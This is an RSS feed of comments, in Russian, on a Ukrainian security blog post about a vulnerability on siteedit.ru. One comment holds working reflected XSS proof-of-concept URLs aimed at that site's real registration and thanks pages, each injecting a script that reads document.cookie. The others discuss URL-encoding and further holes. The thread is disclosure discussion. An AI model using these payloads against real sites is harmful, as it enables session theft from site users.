<?xml version="1.0" encoding="UTF-8"?><!-- generator="wordpress/MustLive Edition" -->
<rss version="2.0" 
	xmlns:content="http://purl.org/rss/1.0/modules/content/">
<channel>
	<title>Коментарі для запису: Уразливість на www.siteedit.ru</title>
	<link>http://websecurity.com.ua/1297/</link>
	<description></description>
	<pubDate>Sun, 19 Apr 2026 10:07:56 +0000</pubDate>
	<generator>http://wordpress.org/?v=MustLive Edition</generator>

	<item>
		<title>від: MustLive</title>
		<link>http://websecurity.com.ua/1297/#comment-108671</link>
		<pubDate>Wed, 06 Feb 2008 23:39:54 +0000</pubDate>
		<guid>http://websecurity.com.ua/1297/#comment-108671</guid>
					<description>&lt;blockquote&gt;К сожалению в комментариях нет возможности вставлять урл не в чистом виде тесктом&lt;/blockquote&gt;
Саша, вполне можно вставлять ссылки текстом ;-) (что я уже подправил в твоём сообщении). Для того, чтобы они не "побились", нужно заменять все специальные символы на их UTF-8 представление. В данном случае нужно было указать UTF-8 коды для символов открывающей и закрывающей скобки. И в этом случае ссылки не разбиваются, при этом оставаясь рабочими для браузеров.

P.S.

В январе я пересмотрел опубликованные тобою последние несколько дыр на сайтах и нашёл новые дыры на этих сайтах :-). О чём я планирую ещё написать.</description>
		<content:encoded><![CDATA[<blockquote><p>К сожалению в комментариях нет возможности вставлять урл не в чистом виде тесктом</p></blockquote>
<p>Саша, вполне можно вставлять ссылки текстом <img src='http://websecurity.com.ua/wp-includes/images/smilies/icon_wink.gif' alt=';-)' class='wp-smiley' />  (что я уже подправил в твоём сообщении). Для того, чтобы они не &#8220;побились&#8221;, нужно заменять все специальные символы на их UTF-8 представление. В данном случае нужно было указать UTF-8 коды для символов открывающей и закрывающей скобки. И в этом случае ссылки не разбиваются, при этом оставаясь рабочими для браузеров.</p>
<p>P.S.</p>
<p>В январе я пересмотрел опубликованные тобою последние несколько дыр на сайтах и нашёл новые дыры на этих сайтах <img src='http://websecurity.com.ua/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> . О чём я планирую ещё написать.
</p>
]]></content:encoded>
				</item>
	<item>
		<title>від: MustLive</title>
		<link>http://websecurity.com.ua/1297/#comment-108627</link>
		<pubDate>Wed, 06 Feb 2008 21:49:25 +0000</pubDate>
		<guid>http://websecurity.com.ua/1297/#comment-108627</guid>
					<description>Да, Саша, смысл понятен ;).

То что на сайте этих ребят (которые к тому же занимаются проведением аудита безопасности) есть ещё и другие уязвимости, я не сомневался, и это подразумевалось. Тратить время на поиск других дыр я не стал, ограничившись одной - во время социального секюрити аудита я обычно ограничиваюсь одной или несколькими дырами (этого вполне достаточно чтобы показать ситуацию с безопасностью на сайте).</description>
		<content:encoded><![CDATA[<p>Да, Саша, смысл понятен <img src='http://websecurity.com.ua/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> .</p>
<p>То что на сайте этих ребят (которые к тому же занимаются проведением аудита безопасности) есть ещё и другие уязвимости, я не сомневался, и это подразумевалось. Тратить время на поиск других дыр я не стал, ограничившись одной - во время социального секюрити аудита я обычно ограничиваюсь одной или несколькими дырами (этого вполне достаточно чтобы показать ситуацию с безопасностью на сайте).
</p>
]]></content:encoded>
				</item>
	<item>
		<title>від: a.komlev</title>
		<link>http://websecurity.com.ua/1297/#comment-108320</link>
		<pubDate>Wed, 06 Feb 2008 14:48:00 +0000</pubDate>
		<guid>http://websecurity.com.ua/1297/#comment-108320</guid>
					<description>К сожалению в комментариях нет возможности вставлять урл не в чистом виде тесктом, а в результате они вот так вот побились... Но думаю смысл понятен  :)</description>
		<content:encoded><![CDATA[<p>К сожалению в комментариях нет возможности вставлять урл не в чистом виде тесктом, а в результате они вот так вот побились&#8230; Но думаю смысл понятен  <img src='http://websecurity.com.ua/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />
</p>
]]></content:encoded>
				</item>
	<item>
		<title>від: a.komlev</title>
		<link>http://websecurity.com.ua/1297/#comment-108318</link>
		<pubDate>Wed, 06 Feb 2008 14:43:38 +0000</pubDate>
		<guid>http://websecurity.com.ua/1297/#comment-108318</guid>
					<description>&lt;a href="http://www.siteedit.ru/registration?first_name=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&#038;last_name=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&#038;email=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E" rel="nofollow"&gt;http://www.siteedit.ru/registration&lt;/a&gt;

&lt;a href="http://www.siteedit.ru/thanks?formobj_email=%3Cscript%3Ealert(document.cookie)%3C/script%3E" rel="nofollow"&gt;http://www.siteedit.ru/thanks&lt;/a&gt;

Примечание: Работает и через POST в том числе.</description>
		<content:encoded><![CDATA[<p><a href="http://www.siteedit.ru/registration?first_name=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&#038;last_name=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&#038;email=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E" rel="nofollow">http://www.siteedit.ru/registration</a></p>
<p><a href="http://www.siteedit.ru/thanks?formobj_email=%3Cscript%3Ealert(document.cookie)%3C/script%3E" rel="nofollow">http://www.siteedit.ru/thanks</a></p>
<p>Примечание: Работает и через POST в том числе.
</p>
]]></content:encoded>
				</item>
</channel>
</rss>
